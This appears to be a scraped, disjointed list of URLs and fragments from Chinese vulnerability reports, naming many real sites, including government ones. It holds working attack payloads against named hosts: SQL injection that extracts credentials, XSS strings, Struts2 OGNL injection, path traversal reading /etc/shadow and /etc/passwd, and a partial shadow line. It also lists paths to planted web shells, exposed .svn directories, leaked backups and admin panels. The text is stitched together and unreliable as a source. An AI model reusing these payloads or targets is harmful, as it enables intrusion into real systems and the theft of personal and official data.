http://www.ycztb.com/ycsite/consultant/showresault.aspx?ShowLsh=0&Mlsh=609563 http://www.czzbcg.com/czhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=9cb37289-4ab2-4929-aa46-993e539e91fb&ClientType=13&ModuleType=8102 http://www.txcetc.com:6920/txhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=6e279cde-d5a3-43bd-92ad-58d0ffa2d7c1&ClientType=13&ModuleType=8103 http://www.pbc.gov.cn:8080/%c0./WEB-INF/classes/applicationContext.xml http://www.pbc.gov.cn:8080/.%ae/WEB-INF/classes/applicationContext.xml http://ffp.juneyaoair.com/member/customerInfo.jspx http://www.juneyaomall.com/member/receiverProductInfoList.jspx http://mall.juneyaoair.com/member/receiverProductInfoList.jspx http://tianqi.114la.com http://tianqi.114la.com http://ncztb.jiangxi.gov.cn/ncztb/webservice/UserManageService.asmx http://tempuri.org/GetAllUser soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://www.hbggzy.cn/hubeiyewu/webservice/AjaxUpload.asmx www.hbggzy.cn http://tempuri.org/UploadData soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://dlx.lenovo.com/DLXSite/Logon.aspx http://dlx.lenovo.com/dlx3/DLX.SFR.Web/UI/StoreFront/Visualize/D0000012.asp;.Visu.jpg http://club.sohu.com//message/send_sig_message.php?receiveCN= http://ixss.in//24yLKt?1388480103 http://cnrdn.com/yQqC http://sys.gz.soufun.com http://youxue.xdf.cn,注入点: http://m.youxue.xdf.cn/pic/index?lineid=dae56ce8-e06f-b666-4ec0-123a4818f34b http://m.youxue.xdf.cn/diary/index?lineid=dae56ce8-e06f-b666-4ec0-123a4818f34b http://www.lzfg.com.cn/tt/page/attachfile_upload.asp?savepath=E:\bit-service\tt\ http://110.167.173.115/TT/Page/attachfile_upload.asp?savepath=D:\bit-service\tt\ http://weibo.com/u/3022690473欢迎收听我的微博!# http://amarket.channel.gfan.com/system/LoginAction!login.action# http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=34 http://www.zycms.cn/zf/upfile.asp http://support.zte.com.cn/admin http://www.buick.com.cn/lacrosse/buickcommentdetail.aspx?actionid=130 http://rsj.km.gov.cn/jsp/rsjldxx/showinfo.jsp?id=5862 cn:8004/map/clientXML http://www.yungoucms.cn/?/s_tag/ https://box.lenovo.com/.svn/entries http://doityourway.lenovo.com/.svn/entries http://thinkpadtablet.lenovo.com/.svn/entries http://www.jzhb.gov.cn/ http://www.bjnsf.org/nsf_wlhxxgzpt/ http://59.151.98.212/bjnsfexpert/expertReginfo.do?method=loginCheck http://ccidstudy.ccidnet.com/data/uploads/13885780381.php http://www.pingyao.gov.cn/ http://www.pingyao.gov.cn/dt3/wssb/show_question.asp?id=100005664 http://club.suning.com/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://my.3454.com/flash.php?ac=play&fgid=20 http://xxgk.pingyao.gov.cn/search.asp?search=1 http://oa.pingyao.gov.cn/ http://tieba.baidu.com/managerapply/apply?kw=ww http://www.cba.gov.cn/ http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008 http://www.cba.gov.cn/cbastats/wcba/teamdetail.aspx?id=WTe004 http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008'%20and%20'a'='a http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008'%20and%20'a'='b http://www.cba.gov.cn/cbastats/wcba/calendarsearch.aspx?startshift=4&endshift=19&teamno=WTe004 http://partner.funshion.com/partner/query_binding_config.php?channel_id=103261 http://www.changyang.gov.cn/phpmyadmin/ http://www.cy12333.gov.cn/admin/ http://job.shenzhenair.com/recruitment/index/newslist/jt/2/newstag/x1*/ http://www.xljcg.net/xljcg.rar http://www.xljcg.net/cp/class/?6.html&showtj=1 http://www.xljcg.net/news/class/index.php?0.html&page=2&showtj=&showhot=&author=&key= http://site2.v5shop.com.cn/vpro_standred/。铺面而来的是 http://www.zdor.cn/frendlinks.php?do=list&id=15 ftp://122.72.12.37/data/ http://122.72.12.191/ http://122.72.0.190:8080/ http://122.72.1.164/ http://122.72.1.164:8080/login http://122.72.1.188:8080/login http://hz.zhujia360.com/zhishu/list?forum_id=32&szg=2&price=40 http://116.213.114.13:8080/se/queryindexdata.do http://www.tp-link.com.cn/cms/main.aspx,并修改http://smb.tp-link.com.cn分站内容。 http://www.tp-link.com.cn/cms/editsmbstory.asp?action=edit http://hd.chinatax.gov.cn/jzxx/login/find-password.jsp http://www.sanyuan.com.cn/data/js.php?id=9 http://www.sanyuan.com.cn/flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 http://hz.zhujia360.com/zhishu/pk/ids/363_52 http://www.bdtyj.gov.cn/web.rar http://www.bdtyj.gov.cn/Admin1982/Login.asp http://webservices.99inn.cc/ https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn?randCode=8rhw) http://www.maipu.cn/manage/Login.aspx http://117.121.55.210:81/index.php/login http://t.keepc.com/test.php http://wap.keepc.com/phpinfo.php http://www.keepc.com/down.act?pv=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.keepc.com/w/ph8i.c?uaType=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://p.keepc.com/v1/p1/i.c?c=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://t.keepc.com/tp/nc.act?a=9&c=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&t=new http://wap.keepc.com/register/register.php?act=reg&rand=676675&sid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://wap.keepc.com/register/register.php?act=reg&sid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://support.keepc.com/feedback/list.action?feedback.productId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://support.keepc.com/feedback/feedback/submit.action?feedback.productId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://support.keepc.com/feedback/feedback/list.action?feedback.productId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://union.keepc.com/resources/images/title_t1.gif/00.php http://mp.haitangshow.com/ http://agri.suning.com.cn/ http://m.wxcsmz.com/dypq/wap/movie/movie!index.action http://m.wxcsmz.com/dypq/j.jsp http://m.wxcsmz.com/dypq/ssh2.jsp http://admin.monternet.com/1860/ http://dgfbh.soufun.com/news/admin.asp passwd:admin http://kf.kongzhong.com/faqslist.php?id=7 RT:21Cn http://secaqb.anquanbao.org/sqlin.php?id=9 http://61.135.185.214/ www.baidu.com..\..\..\..\..\..\..\windows\system32\cmd.exe http://service.v5shop.com/Help.aspx?id=460 http://service.v5shop.com/list.aspx?shopname=V5Shop%B1%EA%D7%BC%B0%E6 http://*******/cms/app/info/doc/index.php/15145 http://*******/cms/app/info/doc/index.ph??pCatBodyId=15145 http://*******/cms/app/admin http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action http://wenwen.soso.com/z/ShowUser.e?sp=1f27a3562e8b06e740c0d3c609b9adf3&ch=2013ww.tw.r.tjzj http://agent.21cn.com/drp/trial/trial_entmail_domain_check.jsp?domain= youxue.xdf.cn/main/ajax/getlinecommentlist youxue.xdf.cn/main/ajax/getlinepiccommentlist youxue.xdf.cn/main/apionlinesignu/getcamptimedropdownbycountryidandlineidanddepartcity youxue.xdf.cn/main/blog/_bloglist youxue.xdf.cn/main/diary/_diarylist youxue.xdf.cn/main/linechannel/getlinelistbysearch youxue.xdf.cn/main/linechannel/index youxue.xdf.cn/main/linechannel/_speciallinelist youxue.xdf.cn/main/linechannel/_summerlinelist youxue.xdf.cn/main/showpictures/ajaxgetlineinfoandpicinfo youxue.xdf.cn/main/showpictures/index youxue.xdf.cn/main/showpictures/picdetail http://youxue.xdf.cn/main/apionlin http://demo.kweb800.com/v12/Edit/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp http://www.bjsupervision.gov.cn:8080/caphtjcj/reportForm/querycasereply.action?reportForm.backNum=&reportForm.phoneNum=XXXXXXX http://219.134.88.6/ http://219.134.88.6/shell.asp http://hr.shenzhenair.com http://eshipping.ca-cargo.com/Default.aspx http://www.diycdn.com/diycdn.rar http://www.diycdn.com/admin_DiyCDN/login.asp http://www.myhack58.com/Article/html/3/62/2012/35468.htm http://shop.tompda.com/mall/zj/index.asp http://s.tompda.com/ http://app.edu.ifeng.com/college/.svn/entries http://control.blog.sina.com.cn/blog_rebuild/riaapi/profile/note/notewalladd.php?domain=1 http://control.blog.sina.com.cn/blog_rebuild/riaapi/profile/note/notewalladd.php?domain=1 http://others.enet.com.cn/research/research_result.php?id=2010 mydomains.com/baidu','104857600S','1','2013-12-31 mydomains.com/../',0,1048,0,1,0,0 http://www.eallcn.com/newsdetail.php?id=12498 http://oa.cqmcd.com:8089/admin/存在弱口令,mssql弱口令 http://2012.moban.siteserver.cn/siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=a'%20and%201=@@version%20and%201='1 http://116.52.13.46/dwhnjsy.asp http://116.52.13.46/ynnj2012/Application/QiYeTuiJjxs.aspx http://www.yt10010.com/lt/web/index.aspx http://126.am/AphOJ0 http://flfw.smesd.gov.cn/view.jsp?id=147812 http://eb.elong.com/ForgetPass.html http://wooyun.org/bugs/wooyun-2013-017858 data:text/html;base64,PHNjcmlwdD5hbGVydCgiaGFjayBieSBweDE2MjQiKTwvc2NyaXB0Pg== http://search.spp.gov.cn/was40/index_was40.jsp http://search.spp.gov.cn/was40/search?channelid=19807 http://search.spp.gov.cn/was40/passwd/passwd.htm http://zzszxt.jxedu.gov.cn/t/front/login.action http://tks.ylgt.gov.cn/Database/SiteWeaver.mdb http://tks.ylgt.gov.cn/admin/admin_login.asp http://www.cnpostair.com/yndt.asp?id=155 http://www.71jiu.com/myshop/mb6/index.php?id=56 http://mall.jinjiang.com/admin/Index.aspx http://webpro.jxedu.gov.cn/zccSs/ http://218.25.79.218/syyj/Emergency/时可直接查看到网站文件,然后随便看了一下,网页程序验证不严导致可获得管理员账号密码。 http://218.25.79.218/syyj/Emergency/ManageResources/Expert/Expert.aspx?expertId=151 http://218.25.79.218/syyj/Emergency/ManageResources/Expert/Expert_Edite.aspx?expertId=151 http://218.25.79.218/syyj/Emergency/ManageResources/RescueTeam/RescueTeamManageView.aspx救援队人员详细列表 http://218.25.79.218/syyj/Emergency/ManageResources/Car/CarView.aspx http://218.25.79.218/syyj/Emergency/ManageResponse/EventCheck.aspx http://218.25.79.218/syyj/Emergency/ManageResponse/EvenCheck.aspx http://218.25.79.218/syyj/Emergency/Security/Powers/UserInfoList.aspx http://218.25.79.218/syyj/Emergency/ManageVideo/yutu30Video/yutu30.html http://www.hydron.com.cn/classroom.php?curr_page=eyeshield&type=1 http://www.hydron.com.cn/classroom.php?curr_page=eyeshield&type=1 http://hr.nd.com.cn/FAQ.aspx?ft=2 http://www.scal.com.cn:88/manager/html http://oa.99inn.cc/longincheck.php X-FORWARDED-FOR:127.0.0.1"* http://mb.hainan.gov.cn http://mb.hainan.gov.cn/test.jsp http://www.weekedu.com http://www.asxf.gov.cn/wsxf/manage/login.asp http://www.zjjygsj.gov.cn/web.rar http://www.zjjygsj.gov.cn/admin/Admin_Login.asp http://kyfw.12306.cn/otn/confirmPassenger/autoSubmitOrderRequest提交获取到一个订票的钥匙及余票信息 http://kyfw.12306.cn/otn/confirmPassenger/getQueueCount提交获取席别信息 http://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue确认订票信息 http://www.chevrolet.com.cn/red_chalk/city.ashx http://211.151.99.41 http://222.222.121.167/ http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile http://websites.imqq.com/go/1004/aHR0cDovL3d3dy5tYWljaHVudGFuZy5pbmZv/from/websites https://passport.baidu.com/?getpassindex http://61.135.207.218/wsgi/login http://my.39.net/UserCenter/default.aspx http://zhibo.m.sohu.com http://zhibo.m.sohu.com/r/2513/ http://sim.shenzhenair.com:8000 http://sim.shenzhenair.com:8000/UserFile/ASPXspy2.aspx http://www.91rpg.com/system/top.htm http://www.91rpg.com/system/left.htm http://www.91rpg.com/system/ http://mhzc.91rpg.com/admin/left.htm http://djj.91rpg.com/admin/left.htm http://sxd.91rpg.com/admin/left.htm http://sq.91rpg.com/admin/left.htm http://blcx.91rpg.com/admin/left.htm http://xlfc.91rpg.com/admin/left.htm http://long.91rpg.com/admin/left.htm http://hzw.91rpg.com/admin/left.htm http://www.expsky.com/admin/left.htm http://www.expsky.com/admin/top.htm http://union.pipi.cn/ http://218.94.30.9/2013njbt/Application/QiYeTuiJjxs.aspx(江苏省)的验证: http://211.151.230.205/在线学习平台的问题。 http://211.151.230.205/fckeditor/editor/filemanager/connectors/uploadtest.html http://218.12.43.170/hbagri/.svn/entries http://svn.6636.net:9080/svn/unicomagri/branch/hbagri3/web http://svn.6636.net:9080/svn/unicomagri http://www.startbbs.com/comment/edit/1/1/1 http://www.startbbs.com/comment/edit/1/1254/3888 http://www.startbbs.com/follow/add/2587 http://www.startbbs.com/follow/add/2587 http://www.startbbs.com/follow/add/2586 http://www.yanbian.gov.cn/ http://svip.club.sohu.com/learning/ceeonline/ques.php?item_id=444 http://svip.club.sohu.com/learning/ceeonline/ques.php?item_id=444 http://127.0.0.1/?p=5 http://top.30edu.com/也可以查到一些排名在前的站长的网校号 http://www.u17.com/z/anime/10w/news/news_list.html?cate_id=3 http://www.zjwsbs.gov.cn/portal/ServiceItemInfoAction.action http://web.lkgame.com/ServiceCenter http://www.zyrc.com.cn/per/per_condi_list.asp http://www.zyrc.com.cn/dyzc/manager/index.asp http://www.sxgxt.gov.cn/indexAction.do?dispatch=AccountLogin http://bbs.siteserver.cn/ http://ico.58pic.com/ajax/insertword?w= http://www.jscons.gov.cn/jscons.rar http://www.jscons.gov.cn/jscons/images/007.asp;.jpg http://www.jslottery.com/manage/fckeditor/editor/skins/default/images/toolbar.end.asp;1_2.gif http://www.tuutao.com/index.php http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000 http://www.hp1997.com/ http://admin.hp1997.com/ http://www.ccmids.cn/phpmyadmin http://www.duomi.com/.svn/entries https://frontier.taiy.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.jin.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.huhht.12306.cn/gateway/hydzsw_test1/Dzsw/login_bur.jsp https://frontier.harb.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.qingz.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.nann.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.chengd.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.nanch.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.xian.12306.cn/gateway/hydzsw_test1/Dzsw/login_bur.jsp https://frontier.wuh.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp http://mldzpk.111g.com/login.php?xn_siteid=1&ap http://www.webluker.com/webtools/dns http://www.zsb.pudong-edu.sh.cn/CenterWeb/czzs/Info.asp?id=1208 http://www.digitalchina.com.hk/c/news_business.php?year=2010 http://www.digitalchina.com.hk/c/product.php?id=2 http://www.digitalchina.com.hk/c/ir_report.php?year=2012 http://www.digitalchina.com.hk/html/news_business.php?year=2010 http://www.digitalchina.com.hk/html/product.php?id=2 http://www.digitalchina.com.hk/html/ir_report.php?year=2012 http://read.beifabook.com/admin/modes.aspx http://read.beifabook.com/admin/left.aspx http://localhost:81/guestbook.aspx http://my.qy6.com/sentmsglist.php http://admin.ev123.com/login.php http://211.143.61.213/R_action/loginAction/login.action http://js.passport.189.cn:18080/BME/udb/ http://js.passport.189.cn:18080/ http://js.passport.189.cn:18080/BME/frameset/login.action http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/bindDevice.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/configURLAdd.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/deviceKeyAdd.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/deviceAdd.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/deviceKeyModify.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/iptvUserActive.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/pwdValidTimeSet.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/uploadNum.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/uploadUserID.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/useractivate.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/help/udb_opg/img/ http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/help/system.htm http://js.passport.189.cn:18080/BME/udb/redirect/jsp/web/wlanportal.jsp http://hb.passport.189.cn:18080/ http://jx.passport.189.cn:18080/BME/udb/redirect/jsp/web/j.jsp其他应该还有吧 http://nbadata.m.sohu.com/存在明显的注入漏洞,并且连接数据库的用户权限比较大,可以跨库查询多个数据库中的敏感信息。 www.nfsqtzs.com.cn http://ims.nfsq.com.cn:8191/xplatform/ http://cms.nfsq.com.cn:8186/app/clientManage1!redictReg.action?cflag=1 http://www.weekedu.com/web_Org/Class_Info.aspx?infoid=4142&courseid=4134 http://www.weekedu.com/web_Org/Class_Info.aspx?infoid=4142&courseid=4134 http://www.52xinyou.cn/anli.htm http://www.teiyi.com/,对不起,让你受苦了。 http://www.teiyi.com/payment/yee_mobile.aspx?code=UNICOM http://api.m.kfc.com.cn/.svn/entries多处svn信息 http://tdemo002mp.v5portal.com/ http://tdemo002mp.v5portal.com/member/groupbuy.ashx?id=1 http://oa.king.tcl.com/management/Regeist/Region.aspx http://oa.king.tcl.com/management/Regeist/Region.aspx http://121.14.161.91:8090/logs/ http://zhaopin.cntmi.com/ http://zhaopin.cntmi.com/hr/.svn/ http://zhaopin.cntmi.com/images/.svn/entries http://zhaopin.cntmi.com/news/.svn/entries http://zhaopin.cntmi.com/inc/.svn/entries http://zhaopin.cntmi.com/index/.svn/entries http://zhaopin.cntmi.com/logs/.svn/entries http://zhaopin.cntmi.com/menu/.svn/entries http://zhaopin.cntmi.com/src/.svn/entries http://zhaopin.cntmi.com/user/.svn/entries http://zhaopin.cntmi.com/jspbrowser/.svn/entries http://zhaopin.cntmi.com/jspbrowser/Browser.jsp,上传任意类型文件。 http://124.238.219.44/ http://webtest.dagexing.com/web/index/portal.action http://dls.zzu.edu.cn/dls.zzu.rar http://121.8.99.66/admin/login.action;jsessionid=4F4C8A94EAB4185A3251FDE2E7203B05 http://api.cy.daoyoudao.com/app/diydishlist.do http://api.cy.daoyoudao.com/wooyun.txt http://xiaoxi.daoyoudao.com/user/login_check.do http://xiaoxi.daoyoudao.com/wooyun.txt http://push.daoyoudao.com/cms/upload/execute.do http://t.caijing.com.cn/u/208075 http://hrclub.51job.com/ hrclub.51job.com/blog/user_setting.asp http://v.lefu8.com/customer/operatorLogin.action http://v.lefu8.com/agent/operatorLogin.action http://www.smsic.cn/show/news/showDetail.do?tsNews.id=2744&tsNews.cateid=160 http://www.langzhong.gov.cn/content.asp?id=2 http://pdscore.pconline.com.cn/util/cvs.jsp页面 http://b2b.sogou.com/search/products.do www.qiboot.com www.360shop.com.cn ubuntu:/tmp$ www.qiboot.com http://c.fa.jd.com/adclick?url=http://dujia.jd.com:@www.baidu.com# http://kf1.web08.net/webCompany.php?arg=weibods&style=1&kflist=off%27&kf=&zdkf_type=1&language=zh-cn&charset=gbk&username=&userinfo=&introurl=&lyurl=&lytype=0&copartner=&referer=http%3A%2F%2Flocalhost%2Farticle.aspx%3Fid%3D647&keyword=http%3A%2F%2Flocalhost%2Fzhenduan.aspx&brief=&logo=&question= http://www.jllongtan.gov.cn/leichinews/onews.asp?id=200 http://www.jllongtan.gov.cn/leichinews/onews.asp?id=200 http://xwxt.sict.ac.cn/channel/a001/template.asp?id=97 http://t.caijing.com.cn/bq/?bqid=187 http://bbs.kongzhong.com http://bbs.acr.kongzhong.com http://bbs.b3.kongzhong.com http://bbs.cc.kongzhong.com http://bbs.djz.kongzhong.com http://bbs.gw2.kongzhong.com http://bbs.jj.kongzhong.com http://bbs.ll.kongzhong.com http://bbs.lm.kongzhong.com http://bbs.mil.kongzhong.com http://bbs.oc.kongzhong.com http://bbs.wot.kongzhong.com http://bbs.wowp.kongzhong.com http://bbs.xlx.kongzhong.com http://bbs.zhan.kongzhong.com http://bbshero.kongzhong.com www.cpdc.com.cn http://navi.nlc.gov.cn/repository/conferenceShow.php?id=30028 http://www.zbedu.gov.cn/sunadmin/Editer/ http://www.zbedu.gov.cn/sunadmin/Admin/Collect/SunData/ http://www.hbepb.gov.cn/images/infoview/ http://www.txldbz.gov.cn/txlddown/ http://www.ytstc.gov.cn/UploadSoft/ http://www.hzzbw.gov.cn/Data/ http://3chuang.nau.edu.cn/sanchuang/admin/admin/adminlogin.asp http://124.207.29.201/zygg_fb/wzcp/wzcp.asp www.stampprint.com.cn http://szjxb.nau.edu.cn/admin/ t.caijing.com.cn/u/34641 http://up.53kf.com/bglogin_mini.php,注入参数是(POST):domain_name http://up.53kf.com:80/new.php?id=2370&city=no http://cnpostair.bjsx12.host.35.com/yndt.asp?id=152 http://cnpostair.bjsx12.host.35.com/dt.asp?xwclass=%C6%F3%D2%B5%D0%C2%CE%C5 http://cnpostair.bjsx12.host.35.com/gk.asp?xwClass=%B9%AB%CB%BE%BC%F2%BD%E9 http://cnpostair.bjsx12.host.35.com/gl.asp?xwClass=%C9%FA%B2%FA%D0%C5%CF%A2 http://cnpostair.bjsx12.host.35.com/yndt.asp?id=152 http://cnpostair.bjsx12.host.35.com/yndt.asp?id=152 http://jingfan.tcl.com/sf/Company.asp?id=1 http://www.js11183.com:87/ http://tjxt.idgrow.com/physical/studentbaseinfo/StudentBaseInfoAction.a就可以访问到任意学生的个人基本信息,包括生日、学校等。 http://www.3988idc.com/123.rar http://zf.chinapost.com.cn/index.do acad.cnki.net/KNS/brief/result.aspx?dbprefix=CJFQ http://v.baidu.com/kan/ugcrp/?topn=12&title=dwadwa&iid=3420976387-2222773299&url=http%3A%2F%2Furl.cn%2FWImHqW http://yb.3xhdtube.com/?id=1912644925 http://url.cn/WImHqW http://www.jlpost.com.cn/ http://www.jlpost.com.cn/web.rar http://220.181.109.73:8080/login.action http://www.zjpost.com/post/newsDetails.do?newsID=1911 http://guangchangwu.vcu.ku6.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.cctv6.cn/ftp/ http://video.sunland.org.cn/back/login.action http://58.49.103.231:8081/fzsb/login/login.action http://fc.118100.cn/index.php/website/modPassword?userid=506 http://www.hnpost.com/ http://219.141.185.85/ http://ufsdp.ufida.com/Default.aspx?Rurl=http%3a%2f%2f219.141.185.85%3a80%2flogin.aspx http://mail.chinasarft.gov.cn/ http://lljiuzhu.mca.gov.cn/web/UserAction.do?method=getLoginInfo http://219.239.44.26/UDS/Views/Home/Index.aspx http://219.239.44.183/ http://219.239.44.63/main/frame.asp?language=Chinese&site_id=MjA4&service_type=MA==#中国气象局培训中心同步教学平台系统 http://admin.apppark.cn/adApp_list.action?adApp.type=2 http://www.hainanpost.cn/news_list.asp?cataid=18874368 http://www.hqkd.cn http://pan.baidu.com/s/1lEFzo http://219.141.185.52/ http://219.141.185.52/fangxia/Config/Connetion.xml http://zhidao.baidu.com/profask?cid=12 http://www.eset.com.cn/eset/hack.php http://test.frisochina.com/Admin/fckeditor/editor/filemanager/connectors/test.html http://love.hspost.com.cn/ http://event.youku.com/DS3/index.php http://event.youku.com/pizzahut/student/index.php?id=76&cid= URL:http://wap.12321.cn/rlist.php?category=%25E5%25AE%259E%25E7%2594%25A8%25E6%258A%2580%25E5%25B7%25A7&page=4 http://www.12321.cn/Admin.html http://www.12321.cn/edit/editor.htm www.12321.cn/edit/editor/img.htm http://218.85.73.164:8088/infogate/file/file_server_read.jsp?FileName=/../../../../../../../../../etc/shadow D328Z0:16028:0:99999:7 http://wooyun.org/bugs/wooyun-2014-047873 http://www.fexion.com/feedback/admin_login.htm http:/target/sitestar/admin/index.php?_m=../../robots.txt%00&_a=admin_add http://target/sitestar/admin/index.php?_m=../../../../../../../../../../windows/win.ini%00.jpg&_a=admin_add http://target/sitestar/admin/index.php?_m=../../../../../../../../../../etc/passwd%00.jpg&_a=admin_add http://vrm.lafaso.com/login/login.htm http://www.iswg.cn/new_wordpress/?s=W http://dxz.baomihua.com/gameindex.aspx http://dzpk.baomihua.com/ http://tdyx.baomihua.com/ http://www.cec.gov.cn/phpsso_server/uploadfile/avatar/1/5/4419/1/1/ice.php http://chaogu.ifeng.com http://chaogu.ifeng.com/syb?search=1 http://chaogu.ifeng.com/syb?search=1 http://www.tj12319.cn/callcenter!home.action http://www.tj12319.cn/ic.jsp http://s1.pplive.cn/sta.js/.php https://sso-cas.pplive.cn:8443/cas/login http://zt.pptv.com/edithelp/ http://zt.pptv.com/edithelp/webzt.html http://zt.pptv.com/edithelp/cmszttymb.html http://zt.pptv.com/edithelp/ztsearchhelp.html http://211.142.30.188/proj_phoneplay/front/index!index.action http://211.142.30.188/proj_phoneplay/front/index!index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://211.142.30.188/proj_phoneplay/1.jsp http://218.26.42.141:8080/unicom-moa/admin/public!login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRe http://xsc.cuc.edu.cn/public/login/tealogin.jsp http://219.142.121.44 http://www.tyx.bnu.edu.cn/Admin.aspx http://114.255.218.74/ http://irs.bnu.edu.cn/phpmyadmin/index.php?token=2b0fa795efdf97ddce04b0d80466cf27&db=1 http://ires.cn/inst/medi/index.php http://www.hunantv.com/v/2013/wsgs2/ http://info.peaksport.com//UpdateLog/UpdateList.aspx?LogID=153 http://www.sdzx.gov.cn/zxhy.php?id=308 http://www.cpdm.com.cn/ http://www.cpdm.com.cn/shzx/ http://www.parkson.com.cn/index.html http://baidu.com http://open.kongzhong.com/ http://3mchina.51job.com/sc/esearch_result.php http://www.hvri.ac.cn/newsdetail.aspx?id=3508 http://www.sxagri.ac.cn:80//shiyjs1.asp?kind=4 http://ct.homeinns.com/Login.aspx这个也行,主站前台登陆也可以··· http://zf.chinapost.com.cn/index.do http://www.hfxzzx.gov.cn/sscms/siteserver/Installer/default.aspx http://xxgk.linfen.gov.cn/SiteServer/installer/default.aspx http://chaxun.ahjt.gov.cn/SiteServer/installer/SqlServer.aspx http://gongkai.houma.gov.cn/SiteServer/installer/SqlServer.aspx http://www.yjzjj.gov.cn/houtai http://www.ynta.gov.cn/index.aspx中的项目管理系统,景区管理系统等。 http://xm.ynta.gov.cn/trip/ http://yjs.ciomp.ac.cn:80//more.php?more_id=3 http://yjs.ciomp.ac.cn/file http://yjs.ciomp.ac.cn/zfm1/test.php http://yjs.ciomp.ac.cn/zfm3/test.php http://123.***.***.***:8081/ http://data.snet.com.cn/cms/manage/sort/a.jsp?s_parent_id=17 http://pages.tom.com/.svn/entries http://192.168.24.67:8088/svn/pagemaker/release/release090407 http://192.168.24.67:8088/svn/pagemaker svn:special svn:externals svn:needs-lock https://passport.sogou-inc.com/.svn/entries http://pages.caicai98.tom.com/.svn/entries http://pub.beta.ulechina.tom.com/ http://pub.beta.ulechina.tom.com/.svn/entries http://home.focus.cn/msgview/1632/270131257.html http://dgbest.tom.com/ http://dgbest.tom.com/.svn/entries http://live.sports.tom.com/ http://live.sports.tom.com/.svn/entries http://pic.game.tom.com/.svn/entries http://flash.game.tom.com/.svn/entries http://hi.tom.com/ http://hi.tom.com/.svn/entries http://yy.teatree.cn http://bbs.lenovo.com/utility/restore.php http://zhaopin.aoe.ac.cn/notice/gonggao-readcheck.jsp?id=11 http://dj.cnr.cn/index.php?option=default,view http://sqlmap.org http://tousu.auto.sohu.com)随便点个投诉进去评论插入xss代码 http://tousu.auto.sohu.com/tousu14499.shtml)这里插入代码 http://hangye.letv.com/ http://yuntv.letv.com/域名下的视频耐 http://g3.letv.com/32/7/84/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-0.jpg 